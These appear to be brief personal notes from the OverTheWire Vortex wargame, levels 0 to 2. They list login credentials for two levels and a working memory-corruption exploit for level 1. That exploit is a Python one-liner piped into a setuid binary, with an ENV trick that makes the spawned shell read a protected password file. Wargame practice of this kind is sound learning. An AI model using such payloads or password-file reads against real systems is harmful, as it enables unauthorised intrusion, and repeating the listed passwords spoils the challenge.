Level0:
------------------------------------------------
L0.py 
Username: vortex1 Password: Gq#qu3bF3

Level 1:
------------------------------------------------
- '\\' advances back the pointer

python -c 'print "\\"*257 + "\xca" + "A"' | ./vortex1
sh-4.1# exit

How bash handles EOF..
http://byteninja.blogspot.ro/2011/09/overthewireorg-vortex-level1.html

- create a file with the following contents:
vi /tmp/cmd2
cat /etc/vortex_pass/vortex2

vortex1@melissa:/vortex$ python -c 'print "\\"*257 + "\xca" + "A"' | env ENV=/tmp/cmd2 /vortex/vortex1
23anbT\rE

Username: vortex2 Password: 23anbT\rE

Level 2:
------------------------------------------------

Username: vortex3 Password: 
